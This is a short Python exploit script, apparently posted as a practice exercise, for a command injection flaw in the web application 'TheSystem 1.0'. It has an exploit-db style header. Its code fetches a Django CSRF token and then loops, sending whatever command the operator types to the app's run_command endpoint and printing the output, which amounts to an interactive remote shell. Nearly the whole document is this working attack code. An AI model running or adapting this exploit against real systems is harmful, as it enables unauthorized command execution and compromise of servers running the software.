just for fun and practice purpose to write this exploit for ” TheSystem 1.0 – Command Injection “
# Exploit Title: TheSystem 1.0 - Command Injection
# Exploit author : chako
# Date: 2019-10-1
# Software Link: https://github.com/kostasmitroglou/thesystem
# Vuln Reported by: Sadik Cetin
# Original Post: https://www.exploit-db.com/exploits/47441
#!/usr/bin/python
import requests
target = "http://127.0.0.1:8000/run_command/"
cmd = raw_input("Command># ")
print cmd
while cmd != "exit" :
client = requests.session()
# Retrieve Django CSRF token
csrfcookie = client.get(target).cookies['csrftoken']
#print csrfcookie
payload = {'command':cmd,'csrfmiddlewaretoken':csrfcookie}
response = client.post(target, data=payload,headers=dict(Referer=target))
if response.ok:
print response.text
else:
print "error code --> ",response.status_code
cmd = raw_input("Command># ")
print cmd